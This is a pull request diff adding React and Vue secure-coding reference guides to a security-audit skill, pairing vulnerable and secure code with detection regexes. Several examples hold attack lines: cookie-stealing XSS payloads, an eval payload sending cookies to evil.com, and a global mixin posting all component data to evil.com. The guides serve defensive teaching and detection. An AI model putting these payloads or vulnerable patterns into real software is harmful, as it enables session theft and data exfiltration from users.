+  const session = await getSession();
+  const clientSession = {
+    userId: session.userId,
+    displayName: session.displayName,
+    expiresAt: session.expiresAt,
+  };
+  return <ClientNav session={clientSession} />;
+}
+
+// SECURE: Keep sensitive logic in server components
+async function ServerPage() {
+  const user = await db.users.findUnique({ where: { id: userId } });
+  const isAdmin = user.internalRole === 'admin';
+  return (
+    <>
+      <UserProfile name={user.name} avatarUrl={user.avatarUrl} />
+      {isAdmin && <AdminPanel />}
+    </>
+  );
+}
+```
+
+**Detection regex:** `'use client'[\s\S]*?\b(password|secret|token|ssn|creditCard|hash)\b`
+**Severity:** warning
+
+---
+
+### SA-REACT-05: eval() and Function Constructor in Event Handlers
+
+Using `eval()`, `new Function()`, or `setTimeout`/`setInterval` with string arguments in React components introduces code injection risks, especially when user input reaches these APIs.
+
+```jsx
+// VULNERABLE: eval in event handler
+function Calculator({ expression }) {
+  const handleCalculate = () => {
+    const result = eval(expression);
+    setResult(result);
+  };
+  return <button onClick={handleCalculate}>Calculate</button>;
+}
+
+// VULNERABLE: Function constructor with user input
+function DynamicFilter({ filterCode }) {
+  const filterFn = new Function('item', filterCode);
+  const filtered = items.filter(filterFn);
+  return <ItemList items={filtered} />;
+}
+
+// VULNERABLE: setTimeout with string argument
+function DelayedAction({ action }) {
+  useEffect(() => {
+    setTimeout(action, 1000); // if action is a string, it's eval'd
+  }, [action]);
+}
+```
+
+```jsx
+// SECURE: Use a math parser library instead of eval
+import { evaluate } from 'mathjs';
+
+function Calculator({ expression }) {
+  const handleCalculate = () => {
+    try {
+      const result = evaluate(expression); // safe math-only parser
+      setResult(result);
+    } catch {
+      setError('Invalid expression');
+    }
+  };
+  return <button onClick={handleCalculate}>Calculate</button>;
+}
+
+// SECURE: Predefined filter functions
+const FILTERS = {
+  active: (item) => item.isActive,
+  recent: (item) => item.createdAt > Date.now() - 86400000,
+};
+
+function DynamicFilter({ filterName }) {
+  const filterFn = FILTERS[filterName] || (() => true);
+  const filtered = items.filter(filterFn);
+  return <ItemList items={filtered} />;
+}
+
+// SECURE: setTimeout with function reference
+function DelayedAction({ onAction }) {
+  useEffect(() => {
+    const timer = setTimeout(() => onAction(), 1000);
+    return () => clearTimeout(timer);
+  }, [onAction]);
+}
+```
+
+**Detection regex:** `\beval\s*\(|new\s+Function\s*\(`
+**Severity:** error
+
+---
+
+## Authentication & Data Exposure
+
+### SA-REACT-06: Sensitive Data in React State / Context
+
+Storing sensitive data (tokens, passwords, PII) in React state or context makes it accessible through React DevTools and persisted in component tree snapshots. Any browser extension can read this data.
+
+```jsx
+// VULNERABLE: Auth token stored in React state
+function AuthProvider({ children }) {
+  const [authState, setAuthState] = useState({
+    accessToken: null,
+    refreshToken: null, // visible in React DevTools
+    user: null,
+  });
+
+  return (
+    <AuthContext.Provider value={authState}>
+      {children}
+    </AuthContext.Provider>
+  );
+}
+
+// VULNERABLE: Credit card data in component state
+function PaymentForm() {
+  const [cardNumber, setCardNumber] = useState('');
+  const [cvv, setCvv] = useState('');
+  // Both visible in React DevTools, persisted in memory
+  return (
+    <form>
+      <input value={cardNumber} onChange={(e) => setCardNumber(e.target.value)} />
+      <input value={cvv} onChange={(e) => setCvv(e.target.value)} />
+    </form>
+  );
+}
+
+// VULNERABLE: Full user record with sensitive fields in context
+const UserContext = createContext(null);
+
+function UserProvider({ children }) {
+  const [user, setUser] = useState(null); // includes ssn, dob, etc.
+  return (
+    <UserContext.Provider value={user}>
+      {children}
+    </UserContext.Provider>
+  );
+}
+```
+
+```jsx
+// SECURE: Use httpOnly cookies for tokens (not accessible via JS)
+function AuthProvider({ children }) {
+  const [user, setUser] = useState(null); // only non-sensitive user info
+  // Tokens stored in httpOnly cookies managed by the server
+  // Auth requests include cookies automatically
+
+  return (
+    <AuthContext.Provider value={{ user, isAuthenticated: !!user }}>
+      {children}
+    </AuthContext.Provider>
+  );
+}
+
+// SECURE: Use a PCI-compliant iframe for payment
+function PaymentForm() {
+  // Use Stripe Elements or similar — card data never touches React state
+  return (
+    <Elements stripe={stripePromise}>
+      <CardElement />
+    </Elements>
+  );
+}
+
+// SECURE: Store only display-safe user fields in context
+function UserProvider({ children }) {
+  const [user, setUser] = useState(null);
+  // Only: { id, displayName, email, avatarUrl }
+  // Sensitive fields fetched on-demand via server API
+  return (
+    <UserContext.Provider value={user}>
+      {children}
+    </UserContext.Provider>
+  );
+}
+```
+
+**Detection regex:** `useState\s*\(\s*\{[^}]*(token|secret|password|refreshToken|cvv|ssn|creditCard)`
+**Severity:** warning
+
+---
+
+### SA-REACT-07: Insecure useEffect Data Fetching
+
+Fetching data in `useEffect` without proper auth headers, CSRF tokens, or error handling for auth failures can expose APIs to unauthorized access or leak error details to the client.
+
+```jsx
+// VULNERABLE: No auth header on protected API call
+function Dashboard() {
+  const [data, setData] = useState(null);
+
+  useEffect(() => {
+    fetch('/api/admin/users')
+      .then((res) => res.json())
+      .then(setData);
+  }, []);
+
+  return <UserList users={data} />;
+}
+
+// VULNERABLE: Token in URL query parameter (logged in server logs, browser history)
+function Profile({ userId }) {
+  useEffect(() => {
+    fetch(`/api/user/${userId}?token=${localStorage.getItem('token')}`)
+      .then((res) => res.json())
+      .then(setProfile);
+  }, [userId]);
+}
+
+// VULNERABLE: No error handling leaks auth state
+function SecretData() {
+  useEffect(() => {
+    fetch('/api/secrets', {
+      headers: { Authorization: `Bearer ${token}` },
+    })
+      .then((res) => {
+        if (!res.ok) throw new Error(`HTTP ${res.status}: ${res.statusText}`);
+        return res.json();
+      })
+      .then(setData)
+      .catch((err) => setError(err.message)); // leaks HTTP status details
+  }, []);
+}
+```
+
+```jsx
+// SECURE: Auth header via httpOnly cookie (automatic) or Authorization header
+function Dashboard() {
+  const [data, setData] = useState(null);
+
+  useEffect(() => {
+    let cancelled = false;
+    fetch('/api/admin/users', {
+      credentials: 'same-origin', // sends httpOnly cookies
+      headers: { 'Content-Type': 'application/json' },
+    })
+      .then((res) => {
+        if (res.status === 401 || res.status === 403) {
+          redirectToLogin();
+          return;
+        }
+        if (!res.ok) throw new Error('Request failed');
+        return res.json();
+      })
+      .then((json) => { if (!cancelled) setData(json); })
+      .catch(() => { if (!cancelled) setError('Unable to load data'); });
+    return () => { cancelled = true; };
+  }, []);
+
+  return <UserList users={data} />;
+}
+
+// SECURE: Use a data-fetching library with auth middleware
+import useSWR from 'swr';
+
+const fetcher = (url) =>
+  fetch(url, { credentials: 'same-origin' }).then((res) => {
+    if (!res.ok) throw new Error('Fetch failed');
+    return res.json();
+  });
+
+function Profile({ userId }) {
+  const { data, error } = useSWR(`/api/user/${userId}`, fetcher);
+  if (error) return <div>Failed to load</div>;
+  return <ProfileCard user={data} />;
+}
+```
+
+**Detection regex:** `useEffect\s*\(\s*\(\)\s*=>\s*\{[^}]*fetch\s*\([^)]*\)\s*\.then`
+**Severity:** warning
+
+---
+
+## Security Misconfiguration
+
+### SA-REACT-08: Third-Party Component Risks (Unvetted npm Packages)
+
+Using unvetted or unmaintained npm packages in React applications can introduce supply-chain vulnerabilities. Packages with postinstall scripts, excessive permissions, or known CVEs pose significant risks.
+
+```jsx
+// VULNERABLE: Using an unvetted rich text editor that injects scripts
+import SketchyEditor from 'sketchy-wysiwyg-editor'; // 12 weekly downloads, no audits
+
+function ContentEditor({ content, onChange }) {
+  return <SketchyEditor value={content} onChange={onChange} />;
+}
+
+// VULNERABLE: Using a date picker with known prototype pollution
+import DatePicker from 'abandoned-datepicker'; // last updated 4 years ago
+
+function EventForm() {
+  return <DatePicker onChange={handleDate} />;
+}
+
+// VULNERABLE: Importing a full utility library for one function
+import _ from 'lodash'; // 4.7MB, large attack surface
+
+function UserList({ users }) {
+  const sorted = _.sortBy(users, 'name');
+  return sorted.map((u) => <UserCard key={u.id} user={u} />);
+}
+```
+
+```jsx
+// SECURE: Use well-maintained, audited packages
+import { EditorContent, useEditor } from '@tiptap/react';
+import StarterKit from '@tiptap/starter-kit';
+
+function ContentEditor({ content, onChange }) {
+  const editor = useEditor({
+    extensions: [StarterKit],
+    content,
+    onUpdate: ({ editor }) => onChange(editor.getHTML()),
+  });
+  return <EditorContent editor={editor} />;
+}
+
+// SECURE: Import only what you need (tree-shakeable)
+import sortBy from 'lodash/sortBy';
+
+function UserList({ users }) {
+  const sorted = sortBy(users, 'name');
+  return sorted.map((u) => <UserCard key={u.id} user={u} />);
+}
+
+// SECURE: Audit dependencies regularly
+// package.json scripts:
+// "audit": "npm audit --production",
+// "audit:fix": "npm audit fix"
+// Use: npm ls --all, socket.dev, or Snyk for deep analysis
+```
+
+**Detection regex:** `import\s+.*from\s+['"][^@./][^'"]*['"]`
+**Severity:** info
+
+---
+
+### SA-REACT-09: Missing key Prop Leading to State Leaks Between Items
+
+When React list items share keys or use array indices as keys, component state can leak between logically different items. This can cause one user's data to appear in another user's component instance after reordering.
+
+```jsx
+// VULNERABLE: Using array index as key with stateful components
+function UserMessages({ messages }) {
+  return messages.map((msg, index) => (
+    <MessageEditor key={index} message={msg} />
+    // If list reorders, editor state (draft text) leaks between items
+  ));
+}
+
+// VULNERABLE: Non-unique keys cause state cross-contamination
+function UserList({ users }) {
+  return users.map((user) => (
+    <UserCard key={user.department} user={user} />
+    // Multiple users in same department share state
+  ));
+}
+
+// VULNERABLE: Missing key prop entirely
+function TodoList({ todos }) {
+  return todos.map((todo) => (
+    <TodoItem todo={todo} />
+  ));
+}
+```
+
+```jsx
+// SECURE: Use stable, unique identifiers as keys
+function UserMessages({ messages }) {
+  return messages.map((msg) => (
+    <MessageEditor key={msg.id} message={msg} />
+  ));
+}
+
+// SECURE: Composite key for uniqueness
+function UserList({ users }) {
+  return users.map((user) => (
+    <UserCard key={user.id} user={user} />
+  ));
+}
+
+// SECURE: Always provide unique keys
+function TodoList({ todos }) {
+  return todos.map((todo) => (
+    <TodoItem key={todo.id} todo={todo} />
+  ));
+}
+```
+
+**Detection regex:** `key\s*=\s*\{[^}]*(index|idx|i)\s*\}`
+**Severity:** info
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-REACT-01: dangerouslySetInnerHTML XSS | High | Immediate | Low |
+| SA-REACT-02: JSX expression injection via props | High | 1 week | Medium |
+| SA-REACT-03: javascript: protocol in href | High | Immediate | Low |
+| SA-REACT-04: Server/client component data exposure | Medium | 1 week | Medium |
+| SA-REACT-05: eval/Function constructor injection | Critical | Immediate | Low |
+| SA-REACT-06: Sensitive data in state/context | Medium | 1 week | Medium |
+| SA-REACT-07: Insecure useEffect data fetching | Medium | 1 month | Medium |
+| SA-REACT-08: Unvetted third-party packages | Medium | 1 month | High |
+| SA-REACT-09: Missing/index key prop state leaks | Low | 1 month | Low |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `javascript-typescript-security-features.md` — Language-level patterns
+- `frontend-security.md` — General frontend security patterns
+- `supply-chain-security.md` — npm supply chain risks
+- `nextjs-security.md` — Next.js-specific patterns (builds on React)
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 8 |

--- a/skills/security-audit/references/vue-security.md
+++ b/skills/security-audit/references/vue-security.md
@@ -150,7 +150,7 @@ export default {
 </script>
 ```
 
-**Detection regex:** `:(href|src)\s*=\s*"[^"]*(?!https?://|mailto:)[a-zA-Z]`
+**Detection regex:** `:(href|src)\s*=\s*"(?!https?://|mailto:|/|#)[^"]*"` (PCRE — use `grep -rP`). The negative lookahead is anchored to the start of the attribute value so the protocol check runs before arbitrary characters can consume it.
 **Severity:** warning
 
 **Why it matters:** Vue does not sanitize URL protocols in `v-bind:href` or `v-bind:src`. Starting in Vue 3.x there are warnings for `javascript:` URLs, but they are not blocked by default. Explicit allowlisting of safe protocols is required.

--- a/skills/security-audit/references/vue-security.md
+++ b/skills/security-audit/references/vue-security.md
@@ -1,0 +1,549 @@
+# Vue.js Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Vue.js applications (Vue 2 and Vue 3, including Nuxt where applicable). This reference covers XSS via directives and templates, injection risks, data exposure through state management, and security misconfigurations specific to the Vue ecosystem.
+
+---
+
+## Cross-Site Scripting (XSS)
+
+### SA-VUE-01 — `v-html` Directive XSS
+
+The `v-html` directive renders raw HTML into the DOM. When user-controlled input is passed to `v-html`, it creates a direct XSS vulnerability equivalent to setting `innerHTML`.
+
+```vue
+<!-- VULNERABLE: User input rendered as raw HTML -->
+<template>
+  <div v-html="userComment"></div>
+</template>
+
+<script>
+export default {
+  data() {
+    return {
+      // Attacker submits: <img src=x onerror=alert(document.cookie)>
+      userComment: this.fetchCommentFromAPI()
+    }
+  }
+}
+</script>
+```
+
+```vue
+<!-- SECURE: Use text interpolation or sanitize before rendering -->
+<template>
+  <!-- Option 1: Text interpolation (auto-escaped) -->
+  <div>{{ userComment }}</div>
+
+  <!-- Option 2: Sanitize if HTML rendering is required -->
+  <div v-html="sanitizedComment"></div>
+</template>
+
+<script>
+import DOMPurify from 'dompurify';
+
+export default {
+  computed: {
+    sanitizedComment() {
+      return DOMPurify.sanitize(this.userComment);
+    }
+  }
+}
+</script>
+```
+
+**Detection regex:** `v-html\s*=`
+**Severity:** warning
+
+**Why it matters:** Vue's double-curly-brace interpolation (`{{ }}`) auto-escapes HTML entities. The `v-html` directive deliberately bypasses this protection. Any user-supplied content passed through `v-html` without sanitization is a direct XSS vector.
+
+---
+
+### SA-VUE-02 — Template Expression Injection via Dynamic Compilation
+
+Vue's runtime template compiler (`Vue.compile` or `new Vue({ template: ... })`) can be exploited when user input is interpolated into template strings that are then compiled.
+
+```javascript
+// VULNERABLE: User input compiled as a Vue template
+import Vue from 'vue';
+
+export default {
+  methods: {
+    renderPreview(userInput) {
+      // Attacker submits: {{constructor.constructor('alert(1)')()}}
+      const compiled = Vue.compile(`<div>${userInput}</div>`);
+      return compiled;
+    }
+  }
+}
+```
+
+```javascript
+// SECURE: Never compile user input as templates — use data binding instead
+export default {
+  data() {
+    return {
+      previewContent: ''
+    }
+  },
+  methods: {
+    renderPreview(userInput) {
+      // Treat input as data, not as a template
+      this.previewContent = userInput;
+    }
+  }
+}
+```
+
+**Detection regex:** `Vue\.compile\s*\(|new\s+Vue\s*\(\s*\{[^}]*template\s*:`
+**Severity:** error
+
+**Why it matters:** The runtime template compiler evaluates expressions within `{{ }}` delimiters. If an attacker can inject into a dynamically compiled template string, they gain arbitrary JavaScript execution within the Vue instance context, accessing component data and methods.
+
+---
+
+### SA-VUE-03 — Insecure `v-bind:href` / `v-bind:src` with User Input
+
+Using `v-bind:href` or `:href` with unsanitized user input allows `javascript:` protocol URLs, leading to XSS when the link is clicked or the resource is loaded.
+
+```vue
+<!-- VULNERABLE: User-controlled URL in href -->
+<template>
+  <a :href="userProvidedUrl">Visit Profile</a>
+  <iframe :src="userProvidedUrl"></iframe>
+</template>
+
+<script>
+export default {
+  data() {
+    return {
+      // Attacker submits: javascript:alert(document.cookie)
+      userProvidedUrl: this.$route.query.url
+    }
+  }
+}
+</script>
+```
+
+```vue
+<!-- SECURE: Validate URL protocol before binding -->
+<template>
+  <a :href="safeUrl">Visit Profile</a>
+</template>
+
+<script>
+export default {
+  computed: {
+    safeUrl() {
+      const url = this.userProvidedUrl;
+      try {
+        const parsed = new URL(url, window.location.origin);
+        if (['http:', 'https:', 'mailto:'].includes(parsed.protocol)) {
+          return parsed.href;
+        }
+      } catch (e) {
+        // Invalid URL
+      }
+      return '#';
+    }
+  }
+}
+</script>
+```
+
+**Detection regex:** `:(href|src)\s*=\s*"[^"]*(?!https?://|mailto:)[a-zA-Z]`
+**Severity:** warning
+
+**Why it matters:** Vue does not sanitize URL protocols in `v-bind:href` or `v-bind:src`. Starting in Vue 3.x there are warnings for `javascript:` URLs, but they are not blocked by default. Explicit allowlisting of safe protocols is required.
+
+---
+
+## Injection
+
+### SA-VUE-04 — Client-Side Auth Bypass via Route Guards
+
+Vue Router navigation guards (`beforeEach`, `beforeEnter`) execute entirely in the browser. An attacker can bypass them using browser devtools, direct API calls, or by manipulating the Vue Router state.
+
+```javascript
+// VULNERABLE: Auth check only in client-side route guard
+import { createRouter, createWebHistory } from 'vue-router';
+
+const router = createRouter({
+  history: createWebHistory(),
+  routes: [
+    {
+      path: '/admin',
+      component: AdminPanel,
+      beforeEnter: (to, from, next) => {
+        // This check runs ONLY in the browser — trivially bypassed
+        if (localStorage.getItem('isAdmin') === 'true') {
+          next();
+        } else {
+          next('/login');
+        }
+      }
+    }
+  ]
+});
+```
+
+```javascript
+// SECURE: Server-side auth + client guard as UX convenience only
+// Server middleware (Express example)
+app.use('/api/admin/*', (req, res, next) => {
+  const token = req.headers.authorization;
+  if (!verifyAdminToken(token)) {
+    return res.status(403).json({ error: 'Forbidden' });
+  }
+  next();
+});
+
+// Client route guard is UX only — not a security boundary
+router.beforeEach(async (to, from, next) => {
+  if (to.meta.requiresAuth) {
+    try {
+      await api.get('/api/auth/verify');
+      next();
+    } catch {
+      next('/login');
+    }
+  } else {
+    next();
+  }
+});
+```
+
+**Detection regex:** `beforeEnter\s*:|beforeEach\s*\(`
+**Severity:** warning
+
+**Why it matters:** Client-side route guards provide no security. An attacker can call `router.push('/admin')` from the console, modify `localStorage`, or directly call backend APIs. All authorization must be enforced server-side.
+
+---
+
+### SA-VUE-05 — `eval` in Computed Properties or Watchers
+
+Using `eval()`, `new Function()`, or `setTimeout`/`setInterval` with string arguments inside Vue reactivity hooks allows code injection if the evaluated string includes user input.
+
+```javascript
+// VULNERABLE: eval in a computed property using user input
+export default {
+  props: ['formula'],
+  computed: {
+    result() {
+      // Attacker sets formula to: "; fetch('https://evil.com/steal?c='+document.cookie); //"
+      return eval(this.formula);
+    }
+  }
+}
+```
+
+```javascript
+// SECURE: Use a safe expression parser instead of eval
+import { evaluate } from 'mathjs';
+
+export default {
+  props: ['formula'],
+  computed: {
+    result() {
+      try {
+        // mathjs only evaluates mathematical expressions
+        return evaluate(this.formula);
+      } catch {
+        return 'Invalid expression';
+      }
+    }
+  }
+}
+```
+
+**Detection regex:** `(computed|watch|methods)\s*:\s*\{[^}]*eval\s*\(`
+**Severity:** error
+
+**Why it matters:** Vue's reactivity system means computed properties and watchers re-execute automatically when dependencies change. An `eval()` inside these hooks creates a persistent code injection vector that fires every time the reactive dependency updates.
+
+---
+
+## Data Exposure
+
+### SA-VUE-06 — Vuex/Pinia State Exposure
+
+Storing sensitive data (tokens, secrets, PII) in Vuex or Pinia stores exposes it through Vue DevTools, browser memory, and any component that accesses the store. Pinia and Vuex stores are globally accessible and inspectable.
+
+```javascript
+// VULNERABLE: Storing secrets in Pinia store
+import { defineStore } from 'pinia';
+
+export const useAuthStore = defineStore('auth', {
+  state: () => ({
+    accessToken: '',
+    refreshToken: '',
+    socialSecurityNumber: '',
+    creditCardNumber: '',
+    user: null
+  }),
+  actions: {
+    login(response) {
+      this.accessToken = response.access_token;
+      this.refreshToken = response.refresh_token;
+      this.socialSecurityNumber = response.ssn;
+      this.creditCardNumber = response.cc;
+    }
+  }
+});
+```
+
+```javascript
+// SECURE: Keep secrets in httpOnly cookies; store only non-sensitive UI state
+import { defineStore } from 'pinia';
+
+export const useAuthStore = defineStore('auth', {
+  state: () => ({
+    // Only store what the UI needs — no tokens or PII
+    isAuthenticated: false,
+    userName: '',
+    userRole: ''
+  }),
+  actions: {
+    async login(credentials) {
+      // Server sets httpOnly cookie with tokens
+      const response = await fetch('/api/auth/login', {
+        method: 'POST',
+        credentials: 'include',
+        body: JSON.stringify(credentials)
+      });
+      const data = await response.json();
+      this.isAuthenticated = true;
+      this.userName = data.name;
+      this.userRole = data.role;
+    }
+  }
+});
+```
+
+**Detection regex:** `(defineStore|new\s+Vuex\.Store)\s*\([^)]*\{[\s\S]*?(token|secret|password|apiKey|api_key|ssn|creditCard)`
+**Severity:** error
+
+**Why it matters:** Vue DevTools allows full inspection and modification of store state. Even in production, store contents are accessible via `window.__pinia` or `window.__VUEX_STORE__`. Secrets in reactive state are trivially extractable.
+
+---
+
+### SA-VUE-07 — SSR Hydration Mismatch Data Leak
+
+In SSR applications (Nuxt, Quasar SSR, custom Vue SSR), the server serializes component state into the HTML payload for client hydration. If server-only data (database connection strings, internal API keys, session secrets) leaks into serialized state, it becomes visible in the page source.
+
+```javascript
+// VULNERABLE: Server-only data leaking into SSR hydration state
+// In a Nuxt server route or asyncData
+export default defineNuxtComponent({
+  async asyncData() {
+    const config = useRuntimeConfig();
+    return {
+      // These end up serialized in <script>window.__NUXT__</script>
+      dbResult: await db.query('SELECT * FROM users'),
+      internalApiKey: config.secretApiKey,
+      users: await fetchUsers()
+    }
+  }
+});
+```
+
+```javascript
+// SECURE: Only return client-safe data from SSR data fetching
+export default defineNuxtComponent({
+  async asyncData() {
+    const users = await fetchUsers();
+    return {
+      // Only public, client-safe fields
+      users: users.map(u => ({
+        id: u.id,
+        name: u.name,
+        avatar: u.avatar
+      }))
+    }
+  }
+});
+```
+
+**Detection regex:** `(asyncData|serverPrefetch|fetch)\s*\([^)]*\)\s*\{[\s\S]*?(secret|internal|private|apiKey|connectionString)`
+**Severity:** error
+
+**Why it matters:** SSR hydration embeds component data as a JSON blob in the HTML response (e.g., `window.__NUXT__`). Any data returned from `asyncData`, `fetch`, or `serverPrefetch` is visible in the page source code. This is a common source of credential and PII leaks in SSR Vue apps.
+
+---
+
+## Security Misconfiguration
+
+### SA-VUE-08 — Third-Party Vue Plugin Risks
+
+Vue plugins have unrestricted access to the Vue instance, router, store, and global properties. A compromised or malicious plugin can exfiltrate data, inject scripts, or hijack routing.
+
+```javascript
+// VULNERABLE: Installing unvetted plugins with global access
+import Vue from 'vue';
+import sketchyAnalytics from 'vue-sketchy-analytics';
+import randomFormPlugin from 'random-vue-forms';
+
+// These plugins get access to the entire Vue prototype
+Vue.use(sketchyAnalytics, { trackEverything: true });
+Vue.use(randomFormPlugin);
+```
+
+```javascript
+// SECURE: Audit plugins, use scoped installs, pin versions
+import { createApp } from 'vue';
+import { createPinia } from 'pinia'; // Well-known, audited
+
+const app = createApp(App);
+
+// Only install well-maintained, audited plugins
+app.use(createPinia());
+
+// For less-trusted plugins, wrap in a sandboxed component
+// and limit their access scope
+const sandboxedPlugin = {
+  install(app) {
+    // Provide only specific, limited functionality
+    app.provide('analytics', {
+      track: (event) => safeTrack(event)
+    });
+  }
+};
+app.use(sandboxedPlugin);
+```
+
+**Detection regex:** `Vue\.use\s*\(|app\.use\s*\(`
+**Severity:** info
+
+**Why it matters:** The Vue plugin system grants full access to the application instance. Unlike scoped npm packages, Vue plugins execute in the context of the app and can modify prototypes, intercept lifecycle hooks, and access reactive state. Supply chain attacks via Vue plugins are a significant risk vector.
+
+---
+
+### SA-VUE-09 — Global Mixin/Plugin Injection Risks
+
+Global mixins apply to every component in the application. A global mixin with side effects can introduce vulnerabilities across the entire app, and malicious code in a global mixin is extremely difficult to detect.
+
+```javascript
+// VULNERABLE: Global mixin with dangerous side effects
+import Vue from 'vue';
+
+Vue.mixin({
+  created() {
+    // Runs in EVERY component — exfiltrates all component data
+    if (this.$data) {
+      fetch('https://evil.com/collect', {
+        method: 'POST',
+        body: JSON.stringify({
+          component: this.$options.name,
+          data: this.$data
+        })
+      });
+    }
+  }
+});
+```
+
+```javascript
+// SECURE: Use composables (Vue 3) or scoped mixins instead of global mixins
+// Vue 3 composable — explicit, scoped, auditable
+import { onMounted } from 'vue';
+
+export function useAnalytics(componentName) {
+  onMounted(() => {
+    // Only tracks mount events, no data access
+    internalAnalytics.trackMount(componentName);
+  });
+}
+
+// Usage in a component — opt-in, not global
+import { useAnalytics } from '@/composables/useAnalytics';
+
+export default {
+  setup() {
+    useAnalytics('DashboardPage');
+  }
+}
+```
+
+**Detection regex:** `Vue\.mixin\s*\(|app\.mixin\s*\(`
+**Severity:** warning
+
+**Why it matters:** Global mixins merge into every component's options. This means a single compromised mixin can intercept lifecycle hooks, modify data, and access methods across the entire application. Vue 3's Composition API and composables provide a safer, explicitly scoped alternative.
+
+---
+
+### SA-VUE-10 — Missing CSP with Vue's Template Compiler
+
+Vue's runtime template compiler uses `new Function()` internally, which requires `unsafe-eval` in the Content-Security-Policy. Using the full Vue build (with template compiler) in production weakens CSP.
+
+```html
+<!-- VULNERABLE: Full Vue build requires unsafe-eval in CSP -->
+<meta http-equiv="Content-Security-Policy"
+      content="script-src 'self' 'unsafe-eval'">
+
+<script>
+// Runtime compilation requires unsafe-eval
+new Vue({
+  template: '<div>{{ message }}</div>',
+  data: { message: 'Hello' }
+})
+</script>
+```
+
+```html
+<!-- SECURE: Use pre-compiled templates (vue-loader / Vite) — no unsafe-eval needed -->
+<meta http-equiv="Content-Security-Policy"
+      content="script-src 'self'; style-src 'self'">
+
+<!-- All templates are pre-compiled at build time by vue-loader / @vitejs/plugin-vue -->
+<!-- No runtime template compiler needed -->
+```
+
+```javascript
+// vite.config.js — ensure runtime-only build
+import { defineConfig } from 'vite';
+import vue from '@vitejs/plugin-vue';
+
+export default defineConfig({
+  plugins: [vue()],
+  resolve: {
+    alias: {
+      // Explicit runtime-only build — no template compiler
+      'vue': 'vue/dist/vue.runtime.esm-bundler.js'
+    }
+  }
+});
+```
+
+**Detection regex:** `unsafe-eval.*vue|vue.*unsafe-eval|vue\.esm\.|vue\.global\.|Vue\.compile`
+**Severity:** warning
+
+**Why it matters:** The runtime template compiler calls `new Function()`, which CSP `unsafe-eval` must allow. This weakens CSP protection against XSS because any injected script that uses `eval()` or `new Function()` will also be permitted. Pre-compiling templates at build time eliminates this requirement.
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-VUE-01 — `v-html` XSS | High | 1 week | Low |
+| SA-VUE-02 — Template expression injection | Critical | Immediate | Medium |
+| SA-VUE-03 — `v-bind:href`/`:src` XSS | High | 1 week | Low |
+| SA-VUE-04 — Client-side auth bypass | High | 1 week | Medium |
+| SA-VUE-05 — `eval` in reactivity hooks | Critical | Immediate | Medium |
+| SA-VUE-06 — Vuex/Pinia state exposure | High | 1 week | Medium |
+| SA-VUE-07 — SSR hydration data leak | High | 1 week | Medium |
+| SA-VUE-08 — Third-party plugin risks | Medium | 1 month | High |
+| SA-VUE-09 — Global mixin injection | Medium | 1 month | Medium |
+| SA-VUE-10 — Missing CSP with compiler | Medium | 1 month | Low |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `javascript-typescript-security-features.md` — Language-level JS/TS patterns
+- `frontend-security.md` — General frontend security patterns
+- `security-headers.md` — CSP and security header configuration
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 8 |


### PR DESCRIPTION
## Summary

Tier 2 ecosystem PR — JS/TS + frameworks. Nine new standalone reference guides (~5,846 lines total):

- **`javascript-typescript-security-features.md`**: ECMAScript + TS strict-mode security
- **`nodejs-security-features.md`**: Node runtime permissions, policy files, node:crypto
- **`react-security.md`**: dangerouslySetInnerHTML, javascript: URLs, Hook safety
- **`vue-security.md`**: v-html, template compilation, Vuex XSS
- **`angular-security.md`**: DomSanitizer, TrustedHTML, innerHTML
- **`nextjs-security.md`**: Server Actions, middleware auth, image SSRF, revalidation
- **`nuxt-security.md`**: server routes, useRuntimeConfig secrets, SSR XSS
- **`express-security.md`**: helmet, CSRF, path-to-regexp ReDoS, body-parser limits
- **`nestjs-security.md`**: Guards, @Public leaks, pipes, interceptor auth

Each guide has vulnerable vs secure examples and detection regex hints.

## Provenance

Imported from [evandervecht/security-audit-skill](https://github.com/evandervecht/security-audit-skill). Dual-licensed MIT + CC-BY-SA-4.0. Fork-specific `SA-JS-*` / `SA-NODE-*` / `SA-REACT-*` / … checkpoint IDs stripped (matches Tier 1 pattern).

Attribution: [E van der Vecht](mailto:evandervecht@schubergphilis.com).

## Follow-up

SKILL.md index + description update coming as a single PR after all Tier 2 merges.

## Test plan

- [ ] CI green
- [ ] References render in GitHub preview